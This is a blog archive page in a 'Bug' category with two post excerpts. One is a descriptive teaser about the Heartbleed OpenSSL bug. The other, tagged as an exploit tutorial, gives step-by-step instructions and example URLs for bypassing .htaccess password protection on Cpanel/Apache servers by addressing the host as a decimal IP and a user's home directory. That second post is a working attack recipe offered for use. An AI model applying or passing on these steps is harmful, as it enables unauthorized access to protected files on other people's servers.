Archive for the ‘Bug’ Category

The Heartbleed bug

Posted: April 11, 2014 by teser02 in Bug
0

When I wrote about the GnuTLS bug, I said that this isn’t the last severe TLS stack bug we’d see. I didn’t expect it to be quite this bad, however.

The Heartbleed bug is a particularly nasty bug. It allows an attacker to read up to 64KB of memory, and the security researchers have said:

Without using any privileged information or credentials we were able steal from ourselves the secret keys used for our X.509 certificates, user names and passwords, instant messages, emails and business critical documents and communication.

How could this happen? Let’s read the code and find out. (more…)

Cpanel and Apache by-pass protected directory

Posted: March 12, 2011 by Hacking & Relax in Bug, exploit, Tutorial
0

Software : Cpanel & Apache
Type of vunlnerability : Protected Directory Traversal & Gain Access Files
Tested On : Cpanel 11
Risk of use : High

Discovered by : dinhcaohack
Team Website : http://vniss.net
Exploit
Code:

1. Convert IP: calculate ( (first octet * 2^24) + (second octet *2^16)
+ (third octet * 2^8) + (fourth octet) ).
So we have 65.60.10.2 is 1094453762.
2. Find exact username like : xgroup
3. Access protected directories and files (by .htaccess & .htpasswd) on browser:
http://1094453762/~xgroup/protect/
http://1094453762/~target/protect/index.php
etc.